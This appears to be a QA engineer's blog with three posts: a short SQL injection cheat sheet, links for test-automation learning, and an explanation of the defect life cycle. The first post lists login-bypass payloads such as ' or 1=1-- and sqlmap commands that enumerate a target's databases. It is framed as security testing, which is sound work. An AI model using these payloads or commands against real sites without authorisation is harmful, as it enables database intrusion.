মঙ্গলবার, ২৬ জুলাই, ২০১৬

SQL INJECTION


" or 0=0 #
' or 0=0 #
" or 0=0 --
' or 0=0 --
' or 'x'='x


or 0=0 #
'or 'x'='x
" or "x"="x

' or 1=1--
" or 1=1 --
' or a=a --
" or "a"="a"



SQL injection check with post method:

---cd desktop
----cd sqlmap
----sqlmap.py -u "url" --data="usr&pw" --dbs



SQL injection check using url;

--cd desktop
---cd sqlmap
---sqlmap.py -u URL (with id) --dbs.

রবিবার, ১৫ মে, ২০১৬

Popular link for QA Engineer

http://selenium-by-arun.blogspot.com/p/test-automation_16.html

http://toolsqa.com/java/basic-java-programming/data-types-variables/

http://testingbasicinterviewquestions.blogspot.com/search/label/Automation%20Testing

সোমবার, ৯ মে, ২০১৬

Defect/Bug Life Cycle

From the discovery to resolution a defect moves through a definite lifecycle called the defect lifecycle.
Below find the various states that a defects goes through in its lifecycle. The number of states that a defect goes through varies from project to project. Below lifecycle, covers all possible states.
  • New: When a new defect is logged and posted for the first time. It is assigned a status NEW.
  • Assigned: Once the bug is posted by the tester, the lead of the tester approves the bug and assigns the bug to developer team
  • Open: The developer starts analyzing and works on the defect fix
  • Fixed: When developer makes necessary code change and verifies the change, he or she can make bug status as "Fixed."
  • Pending retest:Once the defect is fixed the developer gives particular code for retesting the code to the tester. Since the testing remains pending from the testers end, the status assigned is "pending request."
  • Retest: Tester does the retesting of the code at this stage to check whether the defect is fixed by the developer or not and change the status to "Re-test."

  • Verified: The tester re-tests the bug after it got fixed by the developer. If there is no bugdetected in the software, then the bug is fixed and the status assigned is "verified."
  • Reopen: If the bug persists even after the developer has fixed the bug, the tester changes the status to "reopened". Once again the bug goes through the life cycle.
  • Closed: If the bug is no longer exits then tester assign the status "Closed." 
  • Duplicate: If the defect is repeated twice or the defect corresponds the same concept of the bug, the status is changed to "duplicate."
  • Rejected: If the developer feels the defect is not a genuine defect than it changes the defect to "rejected."
  • Deferred: If the present bug is not of a prime priority and if it is expected to get fixed in the next release, then status "Deferred" is assigned to such bugs
  • Not a bug:If it does not affect the functionality of the application then the status assigned to a bug is "Not a bug".